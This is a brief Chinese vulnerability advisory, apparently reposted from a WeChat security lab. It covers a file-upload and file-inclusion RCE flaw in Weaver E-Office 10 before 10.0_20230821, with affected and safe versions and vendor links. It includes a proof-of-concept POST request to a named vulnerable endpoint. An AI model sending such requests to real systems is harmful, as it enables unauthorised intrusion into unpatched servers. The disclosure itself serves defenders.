本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!
泛微E-Office 10在 10.0_20230821 版本之前存在远程代码执行漏洞,该漏洞是通过文件上传配合文件包含实现远程代码执行,攻击者可利用此漏洞上传恶意文件并控制服务器。
e-office 10.0_20230821 版本之前
2.对漏洞进行复现
POC (POST)
POST /eoffice10/server/public/api/welink/welink-move HTTP/1.1
Host: 127.0.0.1
User-Agent: Go-http-client/1.1
Content-Length: 0
Accept-Encoding: gzip
3.Xpoc工具测试(漏洞存在)
安全版本:
泛微e-office10 >= 10.0_20230821
http://v10.e-office.cn/eoffice9update/20220525/webroot.zip
https://www.weaver.com.cn/
原文始发于微信公众号(弥天安全实验室):泛微E-Office 10任意文件上传漏洞
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论